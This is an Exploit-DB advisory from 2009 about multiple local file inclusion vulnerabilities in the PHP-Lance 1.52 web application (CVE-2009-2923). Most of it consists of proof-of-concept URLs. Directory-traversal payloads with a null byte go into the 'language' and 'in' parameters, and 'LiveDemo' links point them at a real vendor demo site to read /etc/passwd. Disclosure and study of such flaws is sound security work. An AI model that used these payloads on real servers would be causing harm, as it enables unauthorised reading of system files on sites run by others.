PHP-Lance 1.52 - Multiple Local File Inclusion Vulnerabilities

2009-08-18T00:00:00
ID EDB-ID:9444
Type exploitdb
Reporter jetli007
Modified 2009-08-18T00:00:00

Description

PHP-Lance 1.52 Multiple Local File Inclusion Vulnerabilities. CVE-2009-2923. Webapps exploit for php platform

                                        
                                            #############################
Name : PHP-Lance v1.52
price US $349.95 :p
Demo : http://www.scriptdemo.com/php-lance/
############################# 

------------------------------------------------------------------------

_________________________________                                    
|Author : jetli007                               
|alkhari9007[AT]gmail[DOT]com        
|www.vxx9.cc                                
|Thx&Greets to: 5D;taishi;dr.php;!bad boy!;psycho;ABK;reno 
________________________________


-------------------------------------------------------------------------
PoC's:

   - http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
   - http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
   - http:// 127.0.0.1 / [path] /advanced_search.php?in=[LFI]

 LiveDemo:

   - http://www.scriptdemo.com/php-lance/show.php?catid=5&sch=yellow&language=../../../../../../../../../../../../../etc/passwd%00

   - http://www.scriptdemo.com/php-lance/show.php?catid=5&sch=yellow&language=../../../../../../../../../../../../../etc/passwd%00
  
   - http://www.scriptdemo.com/php-lance/advanced_search.php?in=../../../../../../../../../../../../../etc/passwd%00
-------------------------------------------------------------------------

# milw0rm.com [2009-08-18]